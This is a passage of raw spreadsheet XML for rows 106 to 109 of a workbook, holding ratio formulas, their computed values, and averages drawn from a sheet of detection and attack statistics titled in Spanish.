      </c>
      <c r="AG106" s="271"/>
      <c r="AH106" s="352" t="s">
        <v>2576</v>
      </c>
      <c r="AI106" s="518">
        <f t="shared" ref="AI106:DJ106" si="135">IF(AI$30=0,"-",AI58/AI$30)</f>
        <v>0.271412844</v>
      </c>
      <c r="AJ106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="AK106" s="518">
        <f t="shared" si="135"/>
        <v>1.75</v>
      </c>
      <c r="AL106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="AM106" s="518">
        <f t="shared" si="135"/>
        <v>0.004526034314</v>
      </c>
      <c r="AN106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="AO106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="AP106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="AQ106" s="518">
        <f t="shared" si="135"/>
        <v>0.9401709402</v>
      </c>
      <c r="AR106" s="518">
        <f t="shared" si="135"/>
        <v>1.75</v>
      </c>
      <c r="AS106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="AT106" s="518">
        <f t="shared" si="135"/>
        <v>4</v>
      </c>
      <c r="AU106" s="518">
        <f t="shared" si="135"/>
        <v>6</v>
      </c>
      <c r="AV106" s="518">
        <f t="shared" si="135"/>
        <v>2</v>
      </c>
      <c r="AW106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="AX106" s="518">
        <f t="shared" si="135"/>
        <v>1.6875</v>
      </c>
      <c r="AY106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="AZ106" s="518">
        <f t="shared" si="135"/>
        <v>1.5</v>
      </c>
      <c r="BA106" s="518">
        <f t="shared" si="135"/>
        <v>14</v>
      </c>
      <c r="BB106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="BC106" s="518">
        <f t="shared" si="135"/>
        <v>16484.33333</v>
      </c>
      <c r="BD106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="BE106" s="518">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="BF106" s="518">
        <f t="shared" si="135"/>
        <v>1.5</v>
      </c>
      <c r="BG106" s="518">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="BH106" s="518">
        <f t="shared" si="135"/>
        <v>396</v>
      </c>
      <c r="BI106" s="518">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="BJ106" s="518">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="BK106" s="518">
        <f t="shared" si="135"/>
        <v>8</v>
      </c>
      <c r="BL106" s="518">
        <f t="shared" si="135"/>
        <v>2</v>
      </c>
      <c r="BM106" s="518">
        <f t="shared" si="135"/>
        <v>47.13244228</v>
      </c>
      <c r="BN106" s="518">
        <f t="shared" si="135"/>
        <v>1.771235521</v>
      </c>
      <c r="BO106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="BP106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="BQ106" s="518">
        <f t="shared" si="135"/>
        <v>1.004901961</v>
      </c>
      <c r="BR106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="BS106" s="518">
        <f t="shared" si="135"/>
        <v>5</v>
      </c>
      <c r="BT106" s="518">
        <f t="shared" si="135"/>
        <v>2</v>
      </c>
      <c r="BU106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="BV106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="BW106" s="518">
        <f t="shared" si="135"/>
        <v>4</v>
      </c>
      <c r="BX106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="BY106" s="518">
        <f t="shared" si="135"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ106" s="518">
        <f t="shared" si="135"/>
        <v>1.081300813</v>
      </c>
      <c r="CA106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="CB106" s="518">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="CC106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="CD106" s="518">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="CE106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="CF106" s="518">
        <f t="shared" si="135"/>
        <v>4</v>
      </c>
      <c r="CG106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="CH106" s="518">
        <f t="shared" si="135"/>
        <v>3</v>
      </c>
      <c r="CI106" s="518">
        <f t="shared" si="135"/>
        <v>33</v>
      </c>
      <c r="CJ106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="CK106" s="518">
        <f t="shared" si="135"/>
        <v>13</v>
      </c>
      <c r="CL106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="CM106" s="518">
        <f t="shared" si="135"/>
        <v>85.5</v>
      </c>
      <c r="CN106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="CO106" s="518">
        <f t="shared" si="135"/>
        <v>2.166666667</v>
      </c>
      <c r="CP106" s="518">
        <f t="shared" si="135"/>
        <v>21.5</v>
      </c>
      <c r="CQ106" s="518">
        <f t="shared" si="135"/>
        <v>3</v>
      </c>
      <c r="CR106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="CS106" s="518">
        <f t="shared" si="135"/>
        <v>0.01110648341</v>
      </c>
      <c r="CT106" s="518">
        <f t="shared" si="135"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="CV106" s="518">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="CW106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="CX106" s="518">
        <f t="shared" si="135"/>
        <v>5</v>
      </c>
      <c r="CY106" s="518">
        <f t="shared" si="135"/>
        <v>16</v>
      </c>
      <c r="CZ106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="DA106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="DB106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="DC106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="DD106" s="518">
        <f t="shared" si="135"/>
        <v>7</v>
      </c>
      <c r="DE106" s="518">
        <f t="shared" si="135"/>
        <v>1.6</v>
      </c>
      <c r="DF106" s="518">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="DG106" s="518" t="str">
        <f t="shared" si="135"/>
        <v>-</v>
      </c>
      <c r="DH106" s="518">
        <f t="shared" si="135"/>
        <v>1.055555556</v>
      </c>
      <c r="DI106" s="518">
        <f t="shared" si="135"/>
        <v>0.4982357731</v>
      </c>
      <c r="DJ106" s="519">
        <f t="shared" si="135"/>
        <v>1.363636364</v>
      </c>
      <c r="DK106" s="271"/>
      <c r="DO106" s="279"/>
      <c r="DP106" s="271"/>
      <c r="DQ106" s="271"/>
      <c r="DR106" s="271"/>
      <c r="DS106" s="271"/>
      <c r="DT106" s="271"/>
      <c r="DU106" s="271"/>
      <c r="DV106" s="271"/>
      <c r="DW106" s="271"/>
      <c r="DX106" s="271"/>
      <c r="DY106" s="271"/>
      <c r="DZ106" s="271"/>
      <c r="EA106" s="271"/>
      <c r="EB106" s="271"/>
      <c r="EC106" s="271"/>
      <c r="ED106" s="280"/>
      <c r="EG106" s="279"/>
      <c r="EH106" s="271"/>
      <c r="EI106" s="271"/>
      <c r="EJ106" s="271"/>
      <c r="EK106" s="271"/>
      <c r="EL106" s="271"/>
      <c r="EM106" s="271"/>
      <c r="ER106" s="271"/>
      <c r="ES106" s="271"/>
      <c r="ET106" s="271"/>
      <c r="EU106" s="271"/>
      <c r="EV106" s="271"/>
      <c r="EW106" s="271"/>
      <c r="EX106" s="271"/>
      <c r="EY106" s="271"/>
      <c r="EZ106" s="271"/>
      <c r="FA106" s="280"/>
    </row>
    <row r="107">
      <c r="J107" s="277"/>
      <c r="K107" s="434"/>
      <c r="L107" s="353"/>
      <c r="M107" s="353"/>
      <c r="N107" s="354"/>
      <c r="O107" s="278"/>
      <c r="Q107" s="271"/>
      <c r="R107" s="352" t="s">
        <v>2577</v>
      </c>
      <c r="S107" s="501">
        <f t="shared" ref="S107:V107" si="136">S59/S$30</f>
        <v>2.100286113</v>
      </c>
      <c r="T107" s="501">
        <f t="shared" si="136"/>
        <v>0.03957039002</v>
      </c>
      <c r="U107" s="501">
        <f t="shared" si="136"/>
        <v>1.134920635</v>
      </c>
      <c r="V107" s="501">
        <f t="shared" si="136"/>
        <v>3.684210526</v>
      </c>
      <c r="W107" s="501">
        <f t="shared" si="104"/>
        <v>29</v>
      </c>
      <c r="X107" s="501">
        <f t="shared" ref="X107:AF107" si="137">X59/X$30</f>
        <v>7065.714286</v>
      </c>
      <c r="Y107" s="501">
        <f t="shared" si="137"/>
        <v>61</v>
      </c>
      <c r="Z107" s="501">
        <f t="shared" si="137"/>
        <v>31.97427121</v>
      </c>
      <c r="AA107" s="501">
        <f t="shared" si="137"/>
        <v>1.242074928</v>
      </c>
      <c r="AB107" s="501">
        <f t="shared" si="137"/>
        <v>11.95652174</v>
      </c>
      <c r="AC107" s="501">
        <f t="shared" si="137"/>
        <v>7.8</v>
      </c>
      <c r="AD107" s="501">
        <f t="shared" si="137"/>
        <v>0.04668994318</v>
      </c>
      <c r="AE107" s="501">
        <f t="shared" si="137"/>
        <v>6.111111111</v>
      </c>
      <c r="AF107" s="502">
        <f t="shared" si="137"/>
        <v>0.5632653061</v>
      </c>
      <c r="AG107" s="271"/>
      <c r="AH107" s="352" t="s">
        <v>2577</v>
      </c>
      <c r="AI107" s="518">
        <f t="shared" ref="AI107:DJ107" si="138">IF(AI$30=0,"-",AI59/AI$30)</f>
        <v>2.100330275</v>
      </c>
      <c r="AJ107" s="518">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="AK107" s="518">
        <f t="shared" si="138"/>
        <v>2.75</v>
      </c>
      <c r="AL107" s="518">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AM107" s="518">
        <f t="shared" si="138"/>
        <v>0.03957039002</v>
      </c>
      <c r="AN107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="AO107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="AP107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="AQ107" s="518">
        <f t="shared" si="138"/>
        <v>0.9572649573</v>
      </c>
      <c r="AR107" s="518">
        <f t="shared" si="138"/>
        <v>2.25</v>
      </c>
      <c r="AS107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="AT107" s="518">
        <f t="shared" si="138"/>
        <v>4</v>
      </c>
      <c r="AU107" s="518">
        <f t="shared" si="138"/>
        <v>7</v>
      </c>
      <c r="AV107" s="518">
        <f t="shared" si="138"/>
        <v>2</v>
      </c>
      <c r="AW107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="AX107" s="518">
        <f t="shared" si="138"/>
        <v>2.3125</v>
      </c>
      <c r="AY107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="AZ107" s="518">
        <f t="shared" si="138"/>
        <v>2</v>
      </c>
      <c r="BA107" s="518">
        <f t="shared" si="138"/>
        <v>29</v>
      </c>
      <c r="BB107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="BC107" s="518">
        <f t="shared" si="138"/>
        <v>16485</v>
      </c>
      <c r="BD107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="BE107" s="518">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="BF107" s="518">
        <f t="shared" si="138"/>
        <v>1.5</v>
      </c>
      <c r="BG107" s="518">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="BH107" s="518">
        <f t="shared" si="138"/>
        <v>396</v>
      </c>
      <c r="BI107" s="518">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="BJ107" s="518">
        <f t="shared" si="138"/>
        <v>2</v>
      </c>
      <c r="BK107" s="518">
        <f t="shared" si="138"/>
        <v>9</v>
      </c>
      <c r="BL107" s="518">
        <f t="shared" si="138"/>
        <v>2</v>
      </c>
      <c r="BM107" s="518">
        <f t="shared" si="138"/>
        <v>47.17466586</v>
      </c>
      <c r="BN107" s="518">
        <f t="shared" si="138"/>
        <v>22.31988417</v>
      </c>
      <c r="BO107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="BP107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="BQ107" s="518">
        <f t="shared" si="138"/>
        <v>1.004901961</v>
      </c>
      <c r="BR107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="BS107" s="518">
        <f t="shared" si="138"/>
        <v>5.5</v>
      </c>
      <c r="BT107" s="518">
        <f t="shared" si="138"/>
        <v>3</v>
      </c>
      <c r="BU107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="BV107" s="518">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="BW107" s="518">
        <f t="shared" si="138"/>
        <v>10</v>
      </c>
      <c r="BX107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="BY107" s="518">
        <f t="shared" si="138"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ107" s="518">
        <f t="shared" si="138"/>
        <v>1.081300813</v>
      </c>
      <c r="CA107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="CB107" s="518">
        <f t="shared" si="138"/>
        <v>4</v>
      </c>
      <c r="CC107" s="518">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="CD107" s="518">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="CE107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="CF107" s="518">
        <f t="shared" si="138"/>
        <v>7</v>
      </c>
      <c r="CG107" s="518">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="CH107" s="518">
        <f t="shared" si="138"/>
        <v>8</v>
      </c>
      <c r="CI107" s="518">
        <f t="shared" si="138"/>
        <v>33</v>
      </c>
      <c r="CJ107" s="518">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="CK107" s="518">
        <f t="shared" si="138"/>
        <v>16</v>
      </c>
      <c r="CL107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="CM107" s="518">
        <f t="shared" si="138"/>
        <v>90</v>
      </c>
      <c r="CN107" s="518">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="CO107" s="518">
        <f t="shared" si="138"/>
        <v>3.333333333</v>
      </c>
      <c r="CP107" s="518">
        <f t="shared" si="138"/>
        <v>25.5</v>
      </c>
      <c r="CQ107" s="518">
        <f t="shared" si="138"/>
        <v>7</v>
      </c>
      <c r="CR107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="CS107" s="518">
        <f t="shared" si="138"/>
        <v>0.0469110093</v>
      </c>
      <c r="CT107" s="518">
        <f t="shared" si="138"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="CV107" s="518">
        <f t="shared" si="138"/>
        <v>6</v>
      </c>
      <c r="CW107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="CX107" s="518">
        <f t="shared" si="138"/>
        <v>10.5</v>
      </c>
      <c r="CY107" s="518">
        <f t="shared" si="138"/>
        <v>17.5</v>
      </c>
      <c r="CZ107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="DA107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="DB107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="DC107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="DD107" s="518">
        <f t="shared" si="138"/>
        <v>7</v>
      </c>
      <c r="DE107" s="518">
        <f t="shared" si="138"/>
        <v>2.6</v>
      </c>
      <c r="DF107" s="518">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="DG107" s="518" t="str">
        <f t="shared" si="138"/>
        <v>-</v>
      </c>
      <c r="DH107" s="518">
        <f t="shared" si="138"/>
        <v>2.064444444</v>
      </c>
      <c r="DI107" s="518">
        <f t="shared" si="138"/>
        <v>0.4985976658</v>
      </c>
      <c r="DJ107" s="519">
        <f t="shared" si="138"/>
        <v>1.545454545</v>
      </c>
      <c r="DK107" s="271"/>
      <c r="DO107" s="279"/>
      <c r="DP107" s="271"/>
      <c r="DQ107" s="271"/>
      <c r="DR107" s="271"/>
      <c r="DS107" s="271"/>
      <c r="DT107" s="271"/>
      <c r="DU107" s="271"/>
      <c r="DV107" s="271"/>
      <c r="DW107" s="271"/>
      <c r="DX107" s="271"/>
      <c r="DY107" s="271"/>
      <c r="DZ107" s="271"/>
      <c r="EA107" s="271"/>
      <c r="EB107" s="271"/>
      <c r="EC107" s="271"/>
      <c r="ED107" s="280"/>
      <c r="EG107" s="279"/>
      <c r="EH107" s="271"/>
      <c r="EI107" s="271"/>
      <c r="EJ107" s="271"/>
      <c r="EK107" s="271"/>
      <c r="EL107" s="271"/>
      <c r="EM107" s="271"/>
      <c r="ER107" s="271"/>
      <c r="ES107" s="271"/>
      <c r="ET107" s="271"/>
      <c r="EU107" s="271"/>
      <c r="EV107" s="271"/>
      <c r="EW107" s="271"/>
      <c r="EX107" s="271"/>
      <c r="EY107" s="271"/>
      <c r="EZ107" s="271"/>
      <c r="FA107" s="280"/>
    </row>
    <row r="108">
      <c r="J108" s="277"/>
      <c r="K108" s="352" t="s">
        <v>2555</v>
      </c>
      <c r="L108" s="403" t="s">
        <v>2556</v>
      </c>
      <c r="M108" s="403" t="s">
        <v>2557</v>
      </c>
      <c r="N108" s="404" t="s">
        <v>2558</v>
      </c>
      <c r="O108" s="278"/>
      <c r="Q108" s="271"/>
      <c r="R108" s="352" t="s">
        <v>2578</v>
      </c>
      <c r="S108" s="501">
        <f t="shared" ref="S108:V108" si="139">S60/S$31</f>
        <v>0.7384637958</v>
      </c>
      <c r="T108" s="501">
        <f t="shared" si="139"/>
        <v>0.01424340292</v>
      </c>
      <c r="U108" s="501">
        <f t="shared" si="139"/>
        <v>0.126984127</v>
      </c>
      <c r="V108" s="501">
        <f t="shared" si="139"/>
        <v>0.4210526316</v>
      </c>
      <c r="W108" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X108" s="501">
        <f t="shared" ref="X108:AF108" si="140">X60/X$31</f>
        <v>0.09090909091</v>
      </c>
      <c r="Y108" s="501">
        <f t="shared" si="140"/>
        <v>113.1428571</v>
      </c>
      <c r="Z108" s="501">
        <f t="shared" si="140"/>
        <v>0.9009795822</v>
      </c>
      <c r="AA108" s="501">
        <f t="shared" si="140"/>
        <v>0.07204610951</v>
      </c>
      <c r="AB108" s="501">
        <f t="shared" si="140"/>
        <v>0.8695652174</v>
      </c>
      <c r="AC108" s="501">
        <f t="shared" si="140"/>
        <v>2.4</v>
      </c>
      <c r="AD108" s="501">
        <f t="shared" si="140"/>
        <v>0.02427603204</v>
      </c>
      <c r="AE108" s="501">
        <f t="shared" si="140"/>
        <v>2.208333333</v>
      </c>
      <c r="AF108" s="502">
        <f t="shared" si="140"/>
        <v>0.001650021711</v>
      </c>
      <c r="AG108" s="271"/>
      <c r="AH108" s="352" t="s">
        <v>2578</v>
      </c>
      <c r="AI108" s="518">
        <f t="shared" ref="AI108:DJ108" si="141">IF(AI$30=0,"-",AI60/AI$31)</f>
        <v>0.7386422018</v>
      </c>
      <c r="AJ108" s="518">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="AK108" s="518">
        <f t="shared" si="141"/>
        <v>0.25</v>
      </c>
      <c r="AL108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM108" s="518">
        <f t="shared" si="141"/>
        <v>0.01424340292</v>
      </c>
      <c r="AN108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="AO108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="AP108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="AQ108" s="518">
        <f t="shared" si="141"/>
        <v>0.02564102564</v>
      </c>
      <c r="AR108" s="518">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="AS108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="AT108" s="518">
        <f t="shared" si="141"/>
        <v>3</v>
      </c>
      <c r="AU108" s="518">
        <f t="shared" si="141"/>
        <v>2</v>
      </c>
      <c r="AV108" s="518">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="AW108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="AX108" s="518">
        <f t="shared" si="141"/>
        <v>0.5</v>
      </c>
      <c r="AY108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="AZ108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BA108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BB108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="BC108" s="518">
        <f t="shared" si="141"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="BE108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BF108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BG108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BH108" s="518">
        <f t="shared" si="141"/>
        <v>792</v>
      </c>
      <c r="BI108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BJ108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BK108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BL108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BM108" s="518">
        <f t="shared" si="141"/>
        <v>0.1998784933</v>
      </c>
      <c r="BN108" s="518">
        <f t="shared" si="141"/>
        <v>1.346718147</v>
      </c>
      <c r="BO108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="BP108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="BQ108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BR108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="BS108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BT108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BU108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="BV108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BW108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="BX108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="BY108" s="518">
        <f t="shared" si="141"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ108" s="518">
        <f t="shared" si="141"/>
        <v>0.162601626</v>
      </c>
      <c r="CA108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="CB108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CC108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CD108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CE108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="CF108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CG108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CH108" s="518">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="CI108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CJ108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CK108" s="518">
        <f t="shared" si="141"/>
        <v>8</v>
      </c>
      <c r="CL108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="CM108" s="518">
        <f t="shared" si="141"/>
        <v>1.5</v>
      </c>
      <c r="CN108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CO108" s="518">
        <f t="shared" si="141"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP108" s="518">
        <f t="shared" si="141"/>
        <v>11.5</v>
      </c>
      <c r="CQ108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CR108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="CS108" s="518">
        <f t="shared" si="141"/>
        <v>0.02458697765</v>
      </c>
      <c r="CT108" s="518">
        <f t="shared" si="141"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="CV108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CW108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="CX108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="CY108" s="518">
        <f t="shared" si="141"/>
        <v>2.823529412</v>
      </c>
      <c r="CZ108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="DA108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="DB108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="DC108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="DD108" s="518">
        <f t="shared" si="141"/>
        <v>5</v>
      </c>
      <c r="DE108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="DF108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="DG108" s="518" t="str">
        <f t="shared" si="141"/>
        <v>-</v>
      </c>
      <c r="DH108" s="518">
        <f t="shared" si="141"/>
        <v>0.04</v>
      </c>
      <c r="DI108" s="518">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="DJ108" s="519">
        <f t="shared" si="141"/>
        <v>0.09090909091</v>
      </c>
      <c r="DK108" s="271"/>
      <c r="DO108" s="279"/>
      <c r="DP108" s="271"/>
      <c r="DQ108" s="271"/>
      <c r="DR108" s="271"/>
      <c r="DS108" s="271"/>
      <c r="DT108" s="271"/>
      <c r="DU108" s="271"/>
      <c r="DV108" s="271"/>
      <c r="DW108" s="271"/>
      <c r="DX108" s="271"/>
      <c r="DY108" s="271"/>
      <c r="DZ108" s="271"/>
      <c r="EA108" s="271"/>
      <c r="EB108" s="271"/>
      <c r="EC108" s="271"/>
      <c r="ED108" s="280"/>
      <c r="EG108" s="279"/>
      <c r="EH108" s="271"/>
      <c r="EI108" s="271"/>
      <c r="EJ108" s="271"/>
      <c r="EK108" s="271"/>
      <c r="EL108" s="271"/>
      <c r="EM108" s="271"/>
      <c r="ER108" s="271"/>
      <c r="ES108" s="271"/>
      <c r="ET108" s="271"/>
      <c r="EU108" s="271"/>
      <c r="EV108" s="271"/>
      <c r="EW108" s="271"/>
      <c r="EX108" s="271"/>
      <c r="EY108" s="271"/>
      <c r="EZ108" s="271"/>
      <c r="FA108" s="280"/>
    </row>
    <row r="109">
      <c r="J109" s="277"/>
      <c r="K109" s="500">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!BN3:BN139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>0.0499595818</v>
      </c>
      <c r="L109" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DD3:DD139)</f>
        <v>0.2301309595</v>
      </c>
      <c r="M109" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!ET3:ET139)</f>
        <v>0.3886675449</v>
      </c>
      <c r="N109" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GJ3:GJ139)</f>
        <v>0.4401962768</v>
      </c>
      <c r="O109" s="278"/>
      <c r="Q109" s="271"/>
      <c r="R109" s="352" t="s">
